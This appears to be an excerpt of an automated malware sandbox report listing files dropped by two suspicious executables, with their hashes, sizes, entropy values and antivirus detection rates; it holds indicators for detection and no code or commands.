                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                        Entropy (8bit):5.535426842040921
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                        Entropy (8bit):5.636032516496583
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                        Entropy (8bit):5.857602289000348
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.629584586954759
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                        Entropy (8bit):6.010605469502259
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36352
                                                                                                                                                                        Entropy (8bit):5.668291349855899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):70144
                                                                                                                                                                        Entropy (8bit):5.909536568846014
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33280
                                                                                                                                                                        Entropy (8bit):5.634433516692816
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34304
                                                                                                                                                                        Entropy (8bit):5.618776214605176
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40448
                                                                                                                                                                        Entropy (8bit):5.7028690200758465
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):6.057993947082715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):6.057993947082715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                        Entropy (8bit):5.535426842040921
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36352
                                                                                                                                                                        Entropy (8bit):5.668291349855899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40448
                                                                                                                                                                        Entropy (8bit):5.7028690200758465
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                        Entropy (8bit):5.41854385721431
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33792
                                                                                                                                                                        Entropy (8bit):5.541771649974822
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):22016
                                                                                                                                                                        Entropy (8bit):5.41854385721431
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                                                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                                                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                                                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                                                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                        Entropy (8bit):5.636032516496583
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):342528
                                                                                                                                                                        Entropy (8bit):6.170134230759619
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                                                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                                                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                                                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                                                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
